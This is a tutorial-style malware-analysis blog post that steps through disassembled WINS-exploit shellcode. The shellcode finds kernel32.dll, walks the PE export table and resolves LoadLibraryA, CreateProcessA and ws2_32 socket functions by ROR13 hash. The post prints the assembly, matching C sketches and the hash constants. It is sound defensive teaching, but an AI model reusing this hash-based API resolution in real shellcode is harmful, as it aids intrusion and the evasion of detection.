Follow the Bouncing Malware: Gone With the WINS - Part II

Published: 2009-05-20
Last Updated: 2009-05-20 15:20:55 UTC
by Tom Liston (Version: 1)

Imagine, if you will, that you're the newest contestant on the latest reality-tv show, Idle American Apprentice to the Dancing Bachelorette Stars.  Like all good reality shows (now there's an oxymoron...), you have the opportunity to "earn" your way to be safe from elimination (you know, that time of the evening when the grumpy, scowling dude with the bad comb-over says "You're Fired"®), if you can manage to "win" some sort of utterly contrived daily "challenge."

And, oh, what a challenge it is! 

You're teamed up with a partner, who is blindfolded, given a cell phone, and driven to your home.  After being spun around a few dozen times to mess with their sense of direction (and really, who doesn't like seeing dizzy, stressed-out people in blindfolds stumbling around in unfamiliar surroundings? Heck, that's how the missus and I spend many a Friday evening... uh... um... nevermind...) they're placed in some random room of your home.  Using only the cell phone, you need to be the first contestant to somehow direct them to find the kitchen and make your pouty-lipped, rail-thin bachelorette a peanut-butter 'n' jelly sammich.

So, what do you do?

Obviously, before anyone will be slappin' Smuckers and Skippy on bread, there's going to need to be a whole lot o'back-and-forth on the phone-- first, as you try to figure out where they are, and then as you try to tell them how to get where they need to be.  Remember, they can't see because they're blindfolded, so you'll need to rely on all of their other senses.  You might start by asking them whether there is carpet on the floor, whether they hear the ticking of a clock... you might ask them to slowly walk around the room and to tell you what the furniture they find in the room feels like, etc... etc... The idea is, you have to start by trying to somehow figure out their location.  Once you know where they are, then you can start giving them some broad direction: "First, face the couch... then turn left. Walk forward until you get to the wall, and then move along it to your left until you find the door. Go out through the door and turn left..."  Then, as you navigate them into the kitchen, you'll get increasingly specific: "open the third cupboard door to the left of the stove, the peanut butter is on the second shelf..."

The overall "flow" in the challenge can be summed up by a series of "big" questions, roughly corresponding to: "Where am I?", "Where is the kitchen?", and "Where is the stuff I need to make lil' Miss Skinny a sammich?"  Answering each of these requires that you've successfully answered each of the questions that preceded it.

This is a fairly useful analogy to the situation in which the malware that we've been looking at has found itself.  Having exploited one of the WINS vulnerabilities patched in MS04-045, the malware is being executed in some pretty unfamiliar territory.  Like your partner in the challenge, it's not in a totally alien landscape: houses are houses... but knowing things about houses in general won't get you navigating around a specific house.  So it is for our chunk o' malware: it's missing all of the niceties that the operating system normally provides.  To understand why this is so, it's necessary for you to understand a little about how Windows programs actually work.

While there are literally millions of vastly different Windows programs available, in many ways, just like "a house is a house", a "program is a program."  On one level, they do many different things... on another level, they do many of the same things:  they display windows on the screen, they access information from the filesystem, the peripherals, and the network, they have clickable buttons, edit fields, drop down menus, scroll-bars, tabs, etc...  If each program on your system had to individually drag along all of the code necessary to do all of those things, then even the most trivial program would rapidly turn into a steaming, multi-megabyte pile of bloat-- i.e. your standard VisualBasic or Delphi app ;-)

To make life easier for programmers and consistent for users (hey, imagine if EVERY application had its own "unique" user interface... ouch, that's gonna leave a mark...) much of the normal, day-to-day "stuff" that programs do has been rolled into shared code libraries ("Dynamic Link Libraries" or DLLs in Windows).  When a Windows program is built, all of the requests for the "stuff" found in the shared code libraries are relegated to a set of "jumping off points" called the "Import Table."  For example, if I write a program that displays a "Do you really want to delete this file?" message box (followed, no doubt, by a "Do you really, REALLY want to delete this file" request) the dialog box is displayed using the system function MessageBoxA().  When my program is compiled, every MessageBoxA() function call that I make in my application actually goes to that "jumping off point" (which, up until the program loads, doesn't "jump off" to anything...).  When my program executes, the Windows Loader looks at the import table, and loads any of the shared DLLs that my program needs into its memory space.  It then runs down through the list of imported functions that my program is using, and fixes up those "jumping off points" so that they point to the correct place within the DLL code in my program's memory space.
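
If you'd like to see the "jumping off point" idea in miniature, here's a rough C sketch. It is a toy model, not how the Windows Loader is actually implemented: the "DLL" is just two ordinary functions, and every name in it (import_slot, export_entry, dll_add, dll_mul, fix_up_imports) is made up for the illustration.

```c
#include <stddef.h>
#include <string.h>

/* Stand-ins for two functions a pretend "DLL" exports (hypothetical). */
int dll_add(int a, int b) { return a + b; }
int dll_mul(int a, int b) { return a * b; }

typedef int (*binary_fn)(int, int);

/* One "jumping off point": the name is known at build time, but the
 * target stays NULL until the loader fills it in. */
struct import_slot {
    const char *name;
    binary_fn   target;
};

/* What the pretend DLL advertises: a name plus the real address. */
struct export_entry {
    const char *name;
    binary_fn   address;
};

const struct export_entry dll_exports[] = {
    { "dll_add", dll_add },
    { "dll_mul", dll_mul },
};

/* Toy "loader": look each imported name up in the DLL's exports and
 * patch the slot. Returns the number of slots that were fixed up. */
size_t fix_up_imports(struct import_slot *imports, size_t count)
{
    size_t n_exports = sizeof dll_exports / sizeof dll_exports[0];
    size_t fixed = 0;

    for (size_t i = 0; i < count; i++) {
        for (size_t j = 0; j < n_exports; j++) {
            if (strcmp(imports[i].name, dll_exports[j].name) == 0) {
                imports[i].target = dll_exports[j].address;
                fixed++;
                break;
            }
        }
    }
    return fixed;
}
```

Until fix_up_imports() has run, calling through a slot would mean calling through NULL, which is roughly the position our malware is in: nobody ran a loader on its behalf.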

Back to our analogy for a moment, the main application is like you... the person who knows their way around the house.  The running application (i.e. you), knows where everything is, because it was there when the house was "built" (i.e. when the Windows Loader loaded up the application and fixed up the import table).  The malicious code that we're looking at has never been in this particular "house" before, and it doesn't know where anything is... it's stumbling around blindfolded and... well... skinning its knees on the coffee table in the living room as we speak.

In Part 1 of this little excursion, we wrapped things up just when the malcode, after first figuring out its own location (so it could decrypt itself), had figured out where the BaseAddress of kernel32.dll was located.  In our analogy, this is the equivalent of you and your partner figuring out that they're in the living room, and then successfully navigating to the kitchen.  The kitchen (played by the enormously popular kernel32.dll) is where all the really useful tools are located... so now let's see how we're going to find them.

If you'll recall, we had just returned from a subroutine that chained through several in-memory data structures (starting with the Process Environment Block) to find the BaseAddress of kernel32.dll, which is now safely stored in EAX.  Here's what we return to:

0000047C                 mov     [esi], eax
0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E

Also recall that we had created a new chunk o' stack for ourselves and had stored its location in ESI.  When we returned from the previous subroutine, interestingly, the stack wasn't completely cleaned up... normally a very bad programming practice that would cause your program to toss its digital cookies. However, remember that the malware created its own "mini-stack" and will (hopefully!) put things back the way it found them before it's through.  In any case, that first instruction is now shoving a copy of the base address of kernel32.dll into the "lost" stack space, while the next instruction pushes the value stored at that location (i.e. the base address itself) onto the top of the stack.  In programming parlance, the "lost" stack locations were used "on the fly" to create some space that our malcode will use like a .bss segment (the .bss segment in a program is a segment which contains uninitialized data... Extra Credit: Anyone know why it's called ".bss"?)

Next, the malcode then pushes a pretty funky number (0xEC0E4E8E) onto the stack and then calls a subroutine.  What the heck is that all about?  Let's take a look at the code for the subroutine (sub_58E) that is being called, and see if we can figure it out:

0000058E ; ======== S U B R O U T I N E ========
0000058E sub_58E         proc near
0000058E arg_0           = dword ptr  14h
0000058E arg_4           = dword ptr  18h
0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi
00000592                 mov     ebp, [esp+arg_4]
00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp
0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp
000005A7 loc_5A7:
000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld
000005B2 loc_5B2:
000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2
000005C0 ; --------------------------------------
000005C0 loc_5C0:
000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7
000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp
000005CB                 mov     cx, [ebx+ecx*2]
000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp
000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD
000005DB ; --------------------------------------
000005DB loc_5DB:
000005DB                 xor     eax, eax
000005DD loc_5DD:
000005DD                 mov     edx, ebp
000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx
000005E3                 retn    4
000005E3 sub_58E         endp
000005E3 ; --------------------------------------

"Gadzooks!  Now hold on just a darned minute!" I hear you cry. "When I signed up for this trip, you said 'some assembly required' but Tom, this is gettin' ridiculous..."

Tempted as I am to go all "General Patton" on your cowardly ass, I will instead gently reassure you that we'll just take things one step at a time and work our way through this stuff together.  We may even hold hands.  So take a deep breath, let it out slowly-- put on your most comfortable set of shoes, pour yourself a wine spritzer, and we'll begin:

Remember from before, that good programming practice dictates that we save out the values in the registers that we're going to use, before we use them... so that we can put everything back in place when we're done.  That's what these four instructions are doing:

0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi

These match up nicely with four other instructions down near the end of the subroutine:

000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx

Remember, those ones at the end need to pop out the values that we pushed onto the stack in the opposite order... because it's a last-in-first-out (LIFO) stack.  Which, coincidentally, is also the key to understanding the next instruction:

00000592                 mov     ebp, [esp+arg_4]

Looking up at the top of the subroutine code, we can see that our disassembler has done something a little weird.  It's created some variables for us, called "arg_0" and "arg_4."  You see, the disassembler understands a couple of interesting things about how code is written, and it has taken that into account when it generated the disassembly in order to help us understand a little more about the code we're looking at.

Generally, programs tend to do small chunks of "stuff" over and over again.  Those chunks of "stuff" are organized by programmers into "functions" or "subroutines."  Functions take parameters (for instance, if you wrote a function to add two numbers, the parameters would be the two numbers to be added), and at the assembly language level, those parameters are passed on the stack. (Gosh, but this "stack" thing is useful, isn't it?)  Before we called this particular subroutine, we pushed some values onto the stack... since, at some point, the subroutine apparently uses those values (as we're about to see...) the disassembler then makes sure we understand what's going on by calling the two parameters (or arguments) to our attention, explicitly, at the top of the subroutine's disassembly.  The problem is this: the parameters are buried deep down in the stack... below the return location that gets pushed onto the stack when the subroutine is called, and even below the stuff that we just now pushed onto the stack-- so we're not gonna be able to just pop those suckers off and use 'em.  That's where these special offset variables up at the top of the subroutine come into play.   The disassembler understands what's going on, and does its best to explain it to us by referencing these as "arg_0" and "arg_4" wherever they are used.  Unlike me, sometimes the disassembler will get things wrong... but for the most part (and especially in this case), it knows what it's talking about.
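
For the arithmetically inclined, here's where the disassembler's 14h and 18h come from. This is just a back-of-the-envelope sketch in C; the function name arg_offset and its parameters are mine, not anything from the malware or the disassembler.

```c
#include <stdint.h>

enum { SLOT = 4 };  /* every push on 32-bit x86 moves ESP by 4 bytes */

/* Offset from ESP (measured after the subroutine has saved its
 * registers) of the n-th most recently pushed argument, where n = 0
 * is the last value pushed before the call. */
uint32_t arg_offset(uint32_t saved_regs, uint32_t n)
{
    uint32_t return_address = 1;  /* one slot, pushed by the call itself */
    return (saved_regs + return_address + n) * SLOT;
}
```

With the four saved registers in sub_58E, arg_offset(4, 0) works out to 0x14 and arg_offset(4, 1) to 0x18, which are exactly the values listed for arg_0 and arg_4.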

Now, remembering that the arguments are pushed onto a LIFO stack, we know that the deeper in the stack the variable is, the earlier it was pushed on... so "arg_4" corresponds to the BaseAddress of kernel32.dll that was pushed onto the stack with this statement:

0000047E                 push    dword ptr [esi]

So, based on the instruction at 00000592, EBP now contains the BaseAddress of kernel32.dll. Then, we see the following:

00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp

So, EAX is loaded with the 32-bit value found at the BaseAddress of kernel32.dll (EBP) plus 60 (0x3C).  EDX is then loaded with whatever is found at the BaseAddress of kernel32.dll, plus *that* value, plus 120 (0x78).  Hmmm... let's see if we can figure out what that means.

We've been talking all along about the "BaseAddress" of kernel32.dll like that actually meant something... but what?  Well, when a dynamic link library (DLL) is loaded into the memory space of a program, what happens is that the full-blown .dll file itself is simply mapped directly into memory-- lock, stock, and barrel.  So, when we talk about the "BaseAddress" for the .dll, it is simply the beginning of that memory mapped file.  So, in order to understand what's going on here, we need to take a look at the format of a .dll file-- which is simply another vile and sinister incarnation of the more general "Portable Executable" (PE) file format used for most Windows executables.

Every PE file begins with an ode to the past... an old DOS header that hangs around to keep Windows backwards compatible.  (Yep, you can run Word 2007 in MS-DOS-- don't let anyone tell you differently. It won't really be all that interesting: it'll just tell you that you need to run it under Windows, but don't be fooled: it executed...) Now, deep down inside that old DOS header (called the "MZ" header... 'cause it begins with Mark Zbikowski's initials...) at position 0x3C is a 32-bit value known as "e_lfanew" that tells you the offset from the beginning of the file to the PE header itself.  In other words, that value tells you how many bytes of "backwards compatible" you need to skip to get to the real meat: the PE header. So what we're seeing so far makes sense: EAX is loaded up with the value of "e_lfanew" and added to the BaseAddress (that's then the beginning of the PE header).  Then, EDX is loaded up with a value at 0x78 within the PE header itself.  Let's see what's there...

Rolling down through the PE header to offset 0x78, we find that location occupied by a 32-bit value known as the "Export Table RVA."  When dealing with PE files, the idea of an "RVA" or "Relative Virtual Address" is used repeatedly.  Because PE files can't be guaranteed that they'll be loaded at the same memory location every time, most of the references to locations within the file are expressed as offsets from the BaseAddress-- a "Relative Virtual Address" or RVA.  And, in this case, we're seeing exactly why that's useful... it's going to make things a whole lot easier for us, because if we know anything at all, it's the BaseAddress of kernel32.dll.  In fact, in the very next instruction we see that we're updating EDX (by adding kernel32.dll's base address, found in EBP) so that it now points directly to the Export Table.
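
Those three instructions translate into C fairly directly. What follows is a minimal sketch, assuming a 32-bit (PE32) image already mapped into a byte buffer; in the 64-bit PE32+ flavor the export entry sits at 0x88 rather than 0x78. The helper names (read_u32, export_table_rva, rva_to_ptr) are made up, the signature checks are my addition (the malware doesn't bother), and there is no bounds checking.

```c
#include <stdint.h>
#include <string.h>

/* Read a little-endian 32-bit value from an arbitrary byte offset. */
uint32_t read_u32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Mirrors: mov eax, [ebp+3Ch] / mov edx, [ebp+eax+78h]
 * Returns the Export Table RVA, or 0 if the buffer doesn't look like
 * a PE image. */
uint32_t export_table_rva(const uint8_t *base)
{
    if (base[0] != 'M' || base[1] != 'Z')           /* DOS "MZ" header */
        return 0;

    uint32_t e_lfanew = read_u32(base + 0x3C);      /* offset of PE header */
    if (memcmp(base + e_lfanew, "PE\0\0", 4) != 0)  /* PE signature */
        return 0;

    return read_u32(base + e_lfanew + 0x78);
}

/* Mirrors: add edx, ebp   (turn an RVA into a usable pointer) */
const uint8_t *rva_to_ptr(const uint8_t *base, uint32_t rva)
{
    return base + rva;
}
```

Notice that everything is expressed relative to base, which is the whole point of RVAs: once you know the BaseAddress, the rest is just addition.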

What the heck is an Export Table?  Well, remember that DLL files are simply libraries of interesting, reusable functions... code to perform exactly the kind of stuff that our malware (and legitimate programs) need to perform over and over.  But, for a DLL to be useful, it needs some way to tell other programs (programs that normally load the DLL at run-time) where, within itself, those interesting functions are found.  The Export Table is a structure that acts sort of like the card-catalog in a library (uh... do libraries actually even have card catalogs anymore, or did I just date myself?), allowing the Windows Loader to know where the functions that the DLL makes available are found, so it can then "fix up" the "Import Table" of the program loading the DLL-- which can then actually use the functions.  The Export Table itself has a specific, known structure, which we'll need to get on speaking terms with, because... well... the next three instructions look like this:

0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp

In this case, we see that we're copying the value found at offset 0x18 in the Export Table into ECX and the value found at offset 0x20 into EBX.  Since this appears to be somewhat important, in a vaguely "it causes the program to work" sorta way, we should probably try to find out what those values represent...

At offset 0x18 in the Export Table structure is a 32 bit value that represents the number of named functions exported by the DLL, and the value at 0x20 is an RVA for the beginning of a list of those names.  After the "add" instruction, EBX contains the full address of that name list.
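
If it helps to see the whole structure at once, here's a sketch of the Export Table's layout as a C struct, with the offsets the malware cares about called out. The field names are descriptive stand-ins I picked for this essay, not necessarily what the Windows headers call them.

```c
#include <stddef.h>
#include <stdint.h>

/* Layout of the Export Table (export directory) in a PE file. */
struct export_directory {
    uint32_t characteristics;      /* 0x00 */
    uint32_t time_date_stamp;      /* 0x04 */
    uint16_t major_version;        /* 0x08 */
    uint16_t minor_version;        /* 0x0A */
    uint32_t name_rva;             /* 0x0C  RVA of the DLL's own name */
    uint32_t ordinal_base;         /* 0x10 */
    uint32_t number_of_functions;  /* 0x14 */
    uint32_t number_of_names;      /* 0x18  loaded into ECX */
    uint32_t functions_rva;        /* 0x1C  RVA of the function address list */
    uint32_t names_rva;            /* 0x20  loaded into EBX: list of name RVAs */
    uint32_t name_ordinals_rva;    /* 0x24  RVA of the name-to-ordinal list */
};

/* Compile-time checks that the struct really matches those offsets. */
_Static_assert(offsetof(struct export_directory, number_of_names) == 0x18,
               "named-function count should sit at 0x18");
_Static_assert(offsetof(struct export_directory, names_rva) == 0x20,
               "name list RVA should sit at 0x20");
```

The fields at 0x1C and 0x24 haven't been touched by the code yet, but they're part of the same structure.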

The next chunk of code:

000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld

starts off by checking the value in ECX: if it is zero, we end up jumping off someplace else that... well... we'll worry about later-- otherwise, the value in ECX is decremented by one.  Right off the bat, this gives us an idea of what is going on here: remember that ECX contained a count of the number of named functions that are exported by kernel32.dll... and so to me, it looks like we're going to step through each of those names looking for something... like some sort of modern-day, silicon-based Diogenes.

Because the names of the functions exported by kernel32.dll aren't all the same length, rather than store the names one after the other, which would require some fancy bookkeeping to keep track of name length, the list of function names is actually a list of RVA values that point to the beginning of each name.  The names themselves are terminated by a "zero," so keeping track of length is unnecessary.  Each RVA is four bytes long, and so this instruction:

000005AA                 mov     esi, [ebx+ecx*4]

is simply a way of calculating the location of the last RVA in the list and putting the value found there into ESI.  As we decrease the value of ECX, we'll move "down" through the list until ECX hits zero, where, it appears, the loop will terminate.  The next two instructions clear out the value of EDI (remember how XOR works?) and then clear the "Direction" flag so that when the next chunk o' code begins rolling over the function name, it's for certain going to be moving in the correct direction. (Don't worry about it... just trust me, it's necessary.)

Now if that little excursion into the world of faith wasn't enough for you, the next few instructions will require you to take my word on even more stuff... 'cause explainin' how we get from one to the other would take us WAAAAY beyond the friendly confines of this little essay.  (I would never lie to you... about anything really, really important....) So, trust me... this stuff here:

000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2

is actually the assembly language equivalent of the C function:

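unsigned long hash(char *function_name)
{
    /* Assumes a 32-bit unsigned long (true for Windows compilers) */
    unsigned long hash = 0;
    while (*function_name != 0) {
        /* rotate right by 13 bits: the "ror edi, 0Dh" */
        hash = hash << (32 - 0x0D) | hash >> 0x0D;
        hash += *function_name++;
    }
    return hash;
}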

This function takes a function name (or really, any string) and then creates a hash value for that name.  "Wow," I hear you say, "it makes a hash value!  That's soooo cool... But what is a hash value?"  A hash value is the result of a function that simply takes a large chunk o' "source" data, and creates a sort of "digital fingerprint"-- a much shorter "hash" value that in some weird mathematical way "represents" the source.  Now because we're representing a large value using a much smaller value, there is no question that each of the resulting hashes will very likely map to more than one single "source" (something called a "hash collision") but for the purposes here, this is a quick and dirty way for our malware to find the function it wants to use, without ever having to actually have the name of the function stuffed somewhere in its code.  Why is that important?  Well, first of all, it makes reverse engineering these things all that much more difficult, but it also makes it harder for an IDS to catch the code as it flies by.
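
If you'd rather check the hash than take it on faith, here's a version pinned to an explicit 32-bit type so that it behaves the same no matter how wide your compiler thinks a long is. It's a sketch of the same rotate-and-add idea; the names ror32 and ror13_hash are mine.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
uint32_t ror32(uint32_t value, unsigned n)
{
    return (value >> n) | (value << (32 - n));
}

/* Rotate the running hash right by 13 bits, then add the next
 * character, until the terminating zero is reached. */
uint32_t ror13_hash(const char *name)
{
    uint32_t hash = 0;
    while (*name != '\0') {
        hash = ror32(hash, 13);
        hash += (uint8_t)*name++;
    }
    return hash;
}
```

Feeding it the string "LoadLibraryA" produces 0xEC0E4E8E, which might look a wee bit familiar.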

Next, we see the following code:

000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7

This portion of the code begins by comparing the hash value that we just created against that funky number that was pushed onto the stack, as a parameter for this function... remember... 0xEC0E4E8E...  If it doesn't match, we jump back up to the beginning of our loop, check to see if ECX is zero, decrement it, and check the next name-- lather, rinse, repeat.  If it does match, then we load up EBX with the value found at offset 0x24 of the Export Table (the address of which is still in EDX):

000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp

Offset 0x24 of the Export Table contains the RVA of the beginning of the OrdinalName list.  The "ordinal" of a function is simply its number (1, 2, 3, 4...) within the list of all functions exported by the DLL.  Every exported function has an ordinal-- but not every function has a name-- some are only ever known by their ordinal. (Why? Because you can make your DLL smaller by forgoing names and using ordinals only... <sarcasm> and we all know that the Oompah Loompahs out in Redmond really care about bloat </sarcasm>... hell, they set the default file alignment on their linker to 4096 and routinely statically link the MSVC runtime in every executable... So, of course, they're gonna want to have a way to save a few bytes by jettisoning the damn function names... But, I digress...) Because of this, the actual location of the code must always be accessed through the ordinal list. The OrdinalName list contains the ordinal for each named exported function, in the same order that the names appear.  So... if you know where you are in the list o' names, you can simply look up the correct ordinal...  In the code above, we first load EBX with the OrdinalName list's RVA, and then add the BaseAddress of kernel32.dll to it.

000005CB                 mov     cx, [ebx+ecx*2]

Ordinals are only 2 bytes long, and since ECX contains the current "position" where we found our name on the name list, it's pretty straightforward to use that same number to get us our ordinal off of the OrdinalName list... which we conveniently load right back into ECX.

000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp

The FunctionAddress list itself is found at offset 0x1C in the Export Table.  For each exported function, the FunctionAddress list contains the RVA of the actual function's code... listed in ordinal order.  So we load the RVA of the beginning of the FunctionAddress list into EBX and add kernel32.dll's BaseAddress (in EBP).

000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD

At this point, ECX contains our ordinal, and each of the addresses in the FunctionAddress list is 4 bytes long... so the instructions above load the RVA of the function we're looking for into EAX and then add the BaseAddress of kernel32.dll.  We then jump to some code that cleans everything up and returns from our subroutine with the information we're looking for tucked away inside EAX.  If something goes south (i.e. we get through the whole list without finding a matching hash) then the subroutine will return with EAX zeroed out.
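
To pull the whole subroutine together, here's a rough C rendering of sub_58E, run against a tiny fabricated "image" instead of the real kernel32.dll. Treat it as a sketch under assumptions: the image layout in build_toy_image() is entirely invented for the demo (the offsets 0x80, 0x100, 0x140 and friends are arbitrary), all of the function names are mine, and there is no bounds checking.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Little-endian helpers, so the sketch behaves the same on any host. */
uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
void wr32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}
void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Same rotate-right-13-and-add hash as the loop at loc_5B2. */
uint32_t ror13_hash(const char *s)
{
    uint32_t h = 0;
    while (*s != '\0') {
        h = (h >> 13) | (h << 19);
        h += (uint8_t)*s++;
    }
    return h;
}

/* C rendering of sub_58E: returns the function's address inside the
 * image, or NULL when no exported name hashes to `wanted`. */
const uint8_t *find_export(const uint8_t *base, uint32_t wanted)
{
    uint32_t e_lfanew = rd32(base + 0x3C);
    const uint8_t *exports = base + rd32(base + e_lfanew + 0x78);
    uint32_t index = rd32(exports + 0x18);        /* named-function count */
    const uint8_t *names = base + rd32(exports + 0x20);

    while (index != 0) {                          /* jecxz loc_5DB */
        index--;                                  /* dec ecx */
        const char *name = (const char *)base + rd32(names + index * 4);
        if (ror13_hash(name) != wanted)
            continue;                             /* jnz loc_5A7 */
        const uint8_t *ordinals = base + rd32(exports + 0x24);
        uint16_t ordinal = rd16(ordinals + index * 2);
        const uint8_t *functions = base + rd32(exports + 0x1C);
        return base + rd32(functions + ordinal * 4u);
    }
    return NULL;                                  /* xor eax, eax */
}

/* Fill `img` (at least 0x300 bytes) with a made-up image that exports
 * three functions, two of them by name. */
void build_toy_image(uint8_t *img)
{
    memset(img, 0, 0x300);
    wr32(img + 0x3C, 0x80);               /* e_lfanew */
    wr32(img + 0x80 + 0x78, 0x100);       /* Export Table RVA */
    wr32(img + 0x100 + 0x14, 3);          /* number of functions */
    wr32(img + 0x100 + 0x18, 2);          /* number of named functions */
    wr32(img + 0x100 + 0x1C, 0x140);      /* FunctionAddress list RVA */
    wr32(img + 0x100 + 0x20, 0x150);      /* name list RVA */
    wr32(img + 0x100 + 0x24, 0x160);      /* OrdinalName list RVA */
    wr32(img + 0x140, 0x200);             /* function 0 (no name) */
    wr32(img + 0x144, 0x210);             /* function 1: LoadLibraryA */
    wr32(img + 0x148, 0x220);             /* function 2: ExitThread */
    wr32(img + 0x150, 0x180);             /* name 0 -> "ExitThread" */
    wr32(img + 0x154, 0x190);             /* name 1 -> "LoadLibraryA" */
    wr16(img + 0x160, 2);                 /* name 0 uses function 2 */
    wr16(img + 0x162, 1);                 /* name 1 uses function 1 */
    strcpy((char *)img + 0x180, "ExitThread");
    strcpy((char *)img + 0x190, "LoadLibraryA");
}
```

In the toy image the names and the functions are deliberately listed in different orders, so the lookup only lands on the right address if it goes name position, then ordinal, then function address, just like the malware does.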

So, what function was represented by the magic hash value we passed in?  Here's a list of some of the hash values for kernel32.dll functions and also some additional code that shows some other functions being located:

Function Name             Hash
LoadLibraryA              0xEC0E4E8E
CreateProcessA            0x16B3FE72
ExitThread                0x60E0CEEF

0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E
0000048A                 mov     [esi+4], eax
0000048D                 push    dword ptr [esi]
0000048F                 push    16B3FE72h
00000494                 call    sub_58E
00000499                 mov     [esi+8], eax
0000049C                 push    dword ptr [esi]
0000049E                 push    60E0CEEFh
000004A3                 call    sub_58E
000004A8                 mov     [esi+0Ch], eax

Note that when each of the calls to the sub_58E subroutine returns, the stack is, again, "messed up".  This is done on purpose to continue to open up more pseudo-bss space in which the malware stores the location of a specific kernel32.dll function.  Since ESI marks the beginning of the original "stack," that is used as the reference point for accessing the addresses of the functions.  At ESI+0x04, is the address of LoadLibraryA, at ESI+0x08 is the address of CreateProcessA, and at ESI+0x0C is the address of ExitThread.

Next, the malware puts one of these newly acquired functions to use:

000004AB                 push    3233h
000004B0                 push    5F327377h
000004B5                 push    esp
000004B6                 call    dword ptr [esi+4]
000004B9                 mov     [esi+10h], eax

All of that pushin' at the beginning of this section is actually shoving the name "ws2_32" onto the stack itself (Go and look at an ASCII chart... and remember stuff is backwards).  That final push of ESP is actually now acting as a pointer to the string sitting on the stack (ESP is a register that contains a pointer to the top of the stack... since our string is sitting on the stack-- we just pushed it on there, ESP acts to point at the string).  Finally, the malware again uses the fact that the stack is "messed up" to provide a storage location for the BaseAddress of ws2_32.dll at esi+0x10 when we get back from the kernel32.dll code.
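
If you don't have an ASCII chart handy, this little C sketch does the "stuff is backwards" bookkeeping for you. It lays out pushed values the way the stack would hold them; the function name pushed_dwords_to_bytes is just something I made up for the demo.

```c
#include <stddef.h>
#include <stdint.h>

/* Lay out pushed dwords the way the stack holds them: the value pushed
 * last sits at the lowest address, and each dword is stored with its
 * least-significant byte first (x86 is little-endian).
 * `out` must have room for count * 4 bytes. */
void pushed_dwords_to_bytes(const uint32_t *pushed_in_order, size_t count,
                            uint8_t *out)
{
    for (size_t i = 0; i < count; i++) {
        uint32_t v = pushed_in_order[count - 1 - i];
        out[i * 4 + 0] = (uint8_t)(v);
        out[i * 4 + 1] = (uint8_t)(v >> 8);
        out[i * 4 + 2] = (uint8_t)(v >> 16);
        out[i * 4 + 3] = (uint8_t)(v >> 24);
    }
}
```

Hand it the two values in the order they were pushed (0x3233, then 0x5F327377) and the bytes come out as 'w', 's', '2', '_', '3', '2', followed by two zero bytes. Those zeros come from the top half of the 0x3233 push, which is what terminates the string for free.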

000004BC                 push    dword ptr [esi+10h]
000004BF                 push    0ADF509D9h
000004C4                 call    sub_58E
000004C9                 mov     [esi+14h], eax
000004CC                 push    dword ptr [esi+10h]
000004CF                 push    60AAF9ECh
000004D4                 call    sub_58E
000004D9                 mov     [esi+18h], eax
000004DC                 push    dword ptr [esi+10h]
000004DF                 push    79C679E7h
000004E4                 call    sub_58E
000004E9                 mov     [esi+1Ch], eax
000004EC                 push    dword ptr [esi+10h]
000004EF                 push    3BFCEDCBh
000004F4                 call    sub_58E
000004F9                 mov     [esi+20h], eax

Now, using the BaseAddress of the ws2_32.dll, the malware looks for hashes matching the following:

WSASocketA            0xADF509D9        (esi+0x14)
connect               0x60AAF9EC        (esi+0x18)
closesocket           0x79C679E7        (esi+0x1C)
WSAStartup            0x3BFCEDCB        (esi+0x20)

And stores each of them at the offsets from ESI listed above...

Ok... so, boys and girls, how was that for a wild ride?  Does your brain hurt yet?  Man, oh man... mine does! 

Well, we made it to the "kitchen," and we figured out how to find all of the tools necessary for our malware to make a sammich... In the next installment, we'll take a look at how that sammich gets made and what it actually does.

Tom Liston - InGuardians, Inc.
